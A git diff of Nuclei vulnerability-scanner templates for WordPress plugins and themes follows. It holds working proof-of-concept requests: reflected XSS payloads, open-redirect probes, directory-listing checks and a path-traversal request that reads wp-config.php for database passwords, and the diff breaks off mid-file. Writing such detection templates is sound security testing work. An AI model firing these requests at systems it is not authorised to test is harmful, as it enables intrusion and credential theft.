b/poc/wordpress/wp-ambience-xss-11407.yaml @@ -0,0 +1,24 @@ +id: wp-ambience-xss +info: + name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38568 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' + matchers-condition: and + matchers: + - type: word + words: + - "<body onload=alert(1)>" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-arforms-listing-11415.yaml b/poc/wordpress/wp-arforms-listing-11415.yaml new file mode 100644 index 0000000000..6cd1b149a0 --- /dev/null +++ b/poc/wordpress/wp-arforms-listing-11415.yaml @@ -0,0 +1,31 @@ +id: wp-arforms-listing + +info: + name: WordPress Plugin Arforms Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the arforms plugin. + reference: + - https://www.exploit-db.com/ghdb/6424 + metadata: + max-request: 1 + tags: listing,plugin,edb,wordpress + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/arforms/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/arforms/" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100d0e4ba31e2d469f96b68276c0c2b88f8f521cbd3eb8008980091875edcaf682702206df949e104c4c4e9658a894fd57b06ac5f4cee88936ad35058eab9361f8a953e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-code-snippets-xss-11426.yaml b/poc/wordpress/wp-code-snippets-xss-11426.yaml index e8d6ab0586..d6d4c61340 100644 --- a/poc/wordpress/wp-code-snippets-xss-11426.yaml +++ b/poc/wordpress/wp-code-snippets-xss-11426.yaml @@ -1,21 +1,13 @@ id: wp-code-snippets-xss - info: - name: WordPress Code Snippets - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: WordPress Code Snippets plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link reference: - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 2 tags: wordpress,xss,wp-plugin,authenticated - -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,7 +20,7 @@ http: - | GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,13 +30,10 @@ http: - 'toplevel_page_snippets' - 'Search results in tag' condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4a0a004730450221008d2f407e72ae3777c6f804c5ffc234ab5d73c7cbb7ff65d90c46c68db7d23bd502206e8386152273c3bf23bee6ba0097f03efac95c1d559b795ef2a3703aa7c1ac08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/wp-code-snippets-xss-11425.yaml b/poc/wordpress/wp-code-snippets-xss.yaml similarity index 100% rename from poc/wordpress/wp-code-snippets-xss-11425.yaml rename to poc/wordpress/wp-code-snippets-xss.yaml diff --git a/poc/wordpress/wp-config-setup.yaml b/poc/wordpress/wp-config-setup.yaml index f7b513af91..3ef91520f3 100644 --- a/poc/wordpress/wp-config-setup.yaml +++ b/poc/wordpress/wp-config-setup.yaml @@ -1,19 +1,28 @@ id: wp-config-setup + info: name: WordPress Setup Configuration author: princechaddha severity: high - reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - tags: wordpress -requests: + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + metadata: + max-request: 1 + tags: wordpress,setup + +http: - method: GET path: - "{{BaseURL}}/wp-admin/setup-config.php?step=1" + matchers-condition: and matchers: - type: word words: - "Below you should enter your database connection details." + - type: status status: - 200 + +# digest: 4b0a00483046022100e979a8be5bb6a555e42d5d6d7e12f302f4a0a0f20ac4bdf0da56786206432cbb022100b26fd2d09915a684fcb09f935ad6af161008ff39c7f3d094484a20a7c1008ba3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-custom-tables-xss-11433.yaml b/poc/wordpress/wp-custom-tables-xss-11433.yaml new file mode 100644 index 0000000000..cae9eef28f --- /dev/null +++ b/poc/wordpress/wp-custom-tables-xss-11433.yaml @@ -0,0 +1,26 @@ +id: wp-custom-tables-xss +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability + reference: + - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "</script><script>alert(document.domain)</script>" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-custom-tables-xss-11434.yaml b/poc/wordpress/wp-custom-tables-xss-11434.yaml deleted file mode 100644 index 834b3dbd81..0000000000 --- a/poc/wordpress/wp-custom-tables-xss-11434.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-custom-tables-xss -info: - name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) - author: daffainfo - severity: medium - description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "</script><script>alert(document.domain)</script>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-custom-tables-xss-11435.yaml b/poc/wordpress/wp-custom-tables-xss-11435.yaml index cae9eef28f..958241da6b 100644 --- a/poc/wordpress/wp-custom-tables-xss-11435.yaml +++ b/poc/wordpress/wp-custom-tables-xss-11435.yaml @@ -1,26 +1,30 @@ id: wp-custom-tables-xss + info: name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) author: daffainfo severity: medium description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: - - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 + reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 tags: wordpress,xss,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/wordpress/wp-debug-log.yaml b/poc/wordpress/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/wordpress/wp-debug-log.yaml +++ b/poc/wordpress/wp-debug-log.yaml @@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-email-subscribers-listing-11443.yaml b/poc/wordpress/wp-email-subscribers-listing-11443.yaml index 01c60a37cb..3752821e40 100644 --- a/poc/wordpress/wp-email-subscribers-listing-11443.yaml +++ b/poc/wordpress/wp-email-subscribers-listing-11443.yaml @@ -4,7 +4,8 @@ info: author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6428 + reference: + - https://www.exploit-db.com/ghdb/6428 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-email-subscribers-listing.yaml b/poc/wordpress/wp-email-subscribers-listing.yaml deleted file mode 100644 index 3752821e40..0000000000 --- a/poc/wordpress/wp-email-subscribers-listing.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wp-email-subscribers-listing -info: - name: WordPress Plugin Email Subscribers Listing - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6428 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/email-subscribers" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/email-subscribers" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-finder-xss-11445.yaml b/poc/wordpress/wp-finder-xss-11445.yaml deleted file mode 100644 index 76d5b6e588..0000000000 --- a/poc/wordpress/wp-finder-xss-11445.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-finder-xss -info: - name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/55217/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "</script><script>alert(document.domain)</script>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-finder-xss-11448.yaml b/poc/wordpress/wp-finder-xss-11448.yaml index b6a54990e1..3f70b6efc9 100644 --- a/poc/wordpress/wp-finder-xss-11448.yaml +++ b/poc/wordpress/wp-finder-xss-11448.yaml @@ -3,17 +3,18 @@ info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: + - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "<script>alert(123);</script>" + - "</script><script>alert(document.domain)</script>" part: body - type: word part: header diff --git a/poc/wordpress/wp-flagem-xss-11454.yaml b/poc/wordpress/wp-flagem-xss-11454.yaml index bc74462f47..90505bc2e4 100644 --- a/poc/wordpress/wp-flagem-xss-11454.yaml +++ b/poc/wordpress/wp-flagem-xss-11454.yaml @@ -1,24 +1,29 @@ id: wp-flagem-xss + info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/wordpress/wp-force-ssl.yaml b/poc/wordpress/wp-force-ssl.yaml new file mode 100644 index 0000000000..4749c95584 --- /dev/null +++ b/poc/wordpress/wp-force-ssl.yaml @@ -0,0 +1,59 @@ +id: wp-force-ssl + +info: + name: > + WP Force SSL & HTTPS SSL Redirect <= 1.66 - Missing Authorization to Settings Update + author: topscoder + severity: low + description: > + The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 4.2 + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-force-ssl/" + google-query: inurl:"/wp-content/plugins/wp-force-ssl/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-force-ssl,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-force-ssl/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-force-ssl" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.66') \ No newline at end of file diff --git a/poc/wordpress/wp-full-path-disclosure-11455.yaml b/poc/wordpress/wp-full-path-disclosure-11455.yaml new file mode 100644 index 0000000000..b4be682139 --- /dev/null +++ b/poc/wordpress/wp-full-path-disclosure-11455.yaml @@ -0,0 +1,16 @@ +id: wp-full-path-disclosure +info: + name: Wordpress Full Path Disclosure + author: arcc + severity: info + reference: https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files + tags: debug,wordpress,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/rss-functions.php" + matchers: + - type: word + words: + - 'Call to undefined function _deprecated_file()' + part: body diff --git a/poc/wordpress/wp-full-path-disclosure-11457.yaml b/poc/wordpress/wp-full-path-disclosure-11457.yaml deleted file mode 100644 index 2909076981..0000000000 --- a/poc/wordpress/wp-full-path-disclosure-11457.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: wp-full-path-disclosure -info: - name: Wordpress - Path Disclosure - author: arcc - severity: info - reference: - - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - - https://core.trac.wordpress.org/ticket/38317 - tags: debug,wordpress,fpd -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/rss-functions.php" - matchers: - - type: word - words: - - 'Call to undefined function _deprecated_file()' - part: body diff --git a/poc/wordpress/wp-full-path-disclosure.yaml b/poc/wordpress/wp-full-path-disclosure.yaml index 24ce07f4e7..2909076981 100644 --- a/poc/wordpress/wp-full-path-disclosure.yaml +++ b/poc/wordpress/wp-full-path-disclosure.yaml @@ -1,5 +1,4 @@ id: wp-full-path-disclosure - info: name: Wordpress - Path Disclosure author: arcc @@ -7,19 +6,13 @@ info: reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - https://core.trac.wordpress.org/ticket/38317 - metadata: - max-request: 1 tags: debug,wordpress,fpd - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-includes/rss-functions.php" - matchers: - type: word words: - 'Call to undefined function _deprecated_file()' part: body - -# digest: 4b0a00483046022100801bbde5d695128c523449e3f13cbcfbdbc6fac825395e2524cd6b020c4e401e022100b3912dc6c4be228a8c60c03136e6707c7b5482f0b095c9c1c530eed718f0862f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-grimag-open-redirect-11458.yaml b/poc/wordpress/wp-grimag-open-redirect-11458.yaml new file mode 100644 index 0000000000..07e6edb532 --- /dev/null +++ b/poc/wordpress/wp-grimag-open-redirect-11458.yaml @@ -0,0 +1,17 @@ +id: wp-grimag-open-redirect +info: + name: WordPress Grimag Themes < 1.1.1 Open Redirection + author: 0x_Akoko + description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a + severity: low + tags: wordpress,wp-theme,redirect +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/wordpress/wp-grimag-open-redirect-11461.yaml b/poc/wordpress/wp-grimag-open-redirect-11461.yaml index 07e6edb532..40803f329c 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11461.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11461.yaml @@ -2,16 +2,17 @@ id: wp-grimag-open-redirect info: name: WordPress Grimag Themes < 1.1.1 Open Redirection author: 0x_Akoko - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a severity: low + description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a tags: wordpress,wp-theme,redirect requests: - method: GET path: - - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/poc/wordpress/wp-grimag-open-redirect-11462.yaml b/poc/wordpress/wp-grimag-open-redirect-11462.yaml index b8089bf787..20ac245e37 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11462.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11462.yaml @@ -1,20 +1,30 @@ id: wp-grimag-open-redirect info: - name: WordPress Grimag Themes < 1.1.1 Open Redirection + name: WordPress Grimag <1.1.1 - Open Redirection author: 0x_Akoko - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a - severity: low - tags: wordpress,wp-theme,redirect + severity: medium + description: WordPress Grimag theme before 1.1.1 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in 1.1.1. + reference: + - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 + tags: wp-theme,redirect,wpscan,wordpress -requests: +http: - method: GET path: - - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4a0a00473045022100d40ec63c134265020e2c32431122360fc45c7638ad3697c5ce3f42982b1cd01b02207e07120720fc907481b2c0530ce58a1079e47bc99d77fb5c35a578ccc5bce04b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-gtranslate-open-redirect.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml similarity index 100% rename from poc/wordpress/wp-gtranslate-open-redirect.yaml rename to poc/wordpress/wp-gtranslate-open-redirect-11463.yaml diff --git a/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml deleted file mode 100644 index 2d9331f914..0000000000 --- a/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wp-gtranslate-open-redirect -info: - name: GTranslate < 2.8.11 - Unauthenticated Open Redirect - author: dhiyaneshDK - severity: medium - description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability. - reference: - - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ - tags: redirect,wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com' - matchers-condition: and - matchers: - - type: word - words: - - "Location: www.pluginvulnerabilities.com" - part: header - - type: status - status: - - 301 diff --git a/poc/wordpress/wp-haberadam-idor.yaml b/poc/wordpress/wp-haberadam-idor.yaml index c933e6ab2a..7832b14743 100644 --- a/poc/wordpress/wp-haberadam-idor.yaml +++ b/poc/wordpress/wp-haberadam-idor.yaml @@ -1,18 +1,24 @@ id: wp-haberadam-idor + info: - name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API + name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure author: pussycat0x severity: low - reference: https://cxsecurity.com/issue/WLB-2021090078 + reference: + - https://cxsecurity.com/issue/WLB-2021090078 metadata: - google-dork: inurl:/wp-content/themes/haberadam/ + max-request: 2 + google-query: inurl:/wp-content/themes/haberadam/ tags: wordpress,idor,wp-theme,disclosure -requests: + +http: - method: GET path: - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id=' - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id=' + stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -23,10 +29,14 @@ requests: - '"degree"' - '"icon"' condition: and + - type: status status: - 200 + - type: word part: header words: - text/html + +# digest: 4a0a00473045022100d9e8e93b959b19bfd97ed5cd26aa422c7c43479e377c47e585b21cc373d67569022047b39f6bc5f1102233c9c860ebfbd32cd7c23818903195ffbbda038a7e0ef149:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-install-11475.yaml b/poc/wordpress/wp-install-11473.yaml similarity index 100% rename from poc/wordpress/wp-install-11475.yaml rename to poc/wordpress/wp-install-11473.yaml diff --git a/poc/wordpress/wp-install.yaml b/poc/wordpress/wp-install.yaml new file mode 100644 index 0000000000..e34f2e2637 --- /dev/null +++ b/poc/wordpress/wp-install.yaml @@ -0,0 +1,22 @@ +id: wp-install +info: + name: WordPress Exposed Installation + author: princechaddha + severity: high + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + tags: wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/install.php" + matchers-condition: and + matchers: + - type: word + words: + - "<title>WordPress › Installation" + - "Site Title" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-iwp-client-listing-11478.yaml b/poc/wordpress/wp-iwp-client-listing-11478.yaml index 09a4b058bf..1927665ec5 100644 --- a/poc/wordpress/wp-iwp-client-listing-11478.yaml +++ b/poc/wordpress/wp-iwp-client-listing-11478.yaml @@ -1,21 +1,16 @@ id: wp-iwp-client-listing - info: name: WordPress Plugin Iwp-client Listing author: pussycat0x severity: info - description: Searches for sensitive directories present in the iwp-client plugin. + description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6427 - metadata: - max-request: 1 - tags: wordpress,listing,plugin,edb - -http: + tags: wordpress,listing,plugin +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/iwp-client/" - matchers-condition: and matchers: - type: word @@ -23,9 +18,6 @@ http: - "Index of" - "wp-content/plugins/iwp-client/" condition: and - - type: status status: - 200 - -# digest: 490a0046304402204561cb16c2d173488139989f893bcd8f50ac7877d77360bd7f9026cfdb96b5db022048fb10551ef70047c675a60f84e33481f13cbeca9f25a75285c49cdf0f51f4ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-iwp-client-listing-11479.yaml b/poc/wordpress/wp-iwp-client-listing-11479.yaml index 8968c15c52..09a4b058bf 100644 --- a/poc/wordpress/wp-iwp-client-listing-11479.yaml +++ b/poc/wordpress/wp-iwp-client-listing-11479.yaml @@ -1,15 +1,21 @@ id: wp-iwp-client-listing + info: name: WordPress Plugin Iwp-client Listing author: pussycat0x severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6427 - tags: wordpress,listing,plugin -requests: + description: Searches for sensitive directories present in the iwp-client plugin. + reference: + - https://www.exploit-db.com/ghdb/6427 + metadata: + max-request: 1 + tags: wordpress,listing,plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/iwp-client/" + matchers-condition: and matchers: - type: word @@ -17,6 +23,9 @@ requests: - "Index of" - "wp-content/plugins/iwp-client/" condition: and + - type: status status: - 200 + +# digest: 490a0046304402204561cb16c2d173488139989f893bcd8f50ac7877d77360bd7f9026cfdb96b5db022048fb10551ef70047c675a60f84e33481f13cbeca9f25a75285c49cdf0f51f4ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-javospot-lfi-11482.yaml b/poc/wordpress/wp-javospot-lfi-11482.yaml new file mode 100644 index 0000000000..bbacef80f0 --- /dev/null +++ b/poc/wordpress/wp-javospot-lfi-11482.yaml @@ -0,0 +1,38 @@ +id: wp-javospot-lfi + +info: + name: WordPress Javo Spot Premium Theme - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content. + reference: + - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ + - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wordpress,wp-theme,lfi,wp,wpscan + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d5a26ecb5591b611b16a4a1e369d97635fc7bb9905cc8c3e153e6888118b2356022100b117f48ee2a84d8badde3cc23950232db0900a4adc39618e14e488e24a65e943:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-javospot-lfi.yaml b/poc/wordpress/wp-javospot-lfi.yaml deleted file mode 100644 index 6786157651..0000000000 --- a/poc/wordpress/wp-javospot-lfi.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wp-javospot-lfi -info: - name: Javo Spot Premium Theme - Unauthenticated Directory Traversal - author: 0x_Akoko - severity: high - description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content. - reference: - - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 - tags: wordpress,wp-theme,lfi,wp -requests: - - method: GET - path: - - 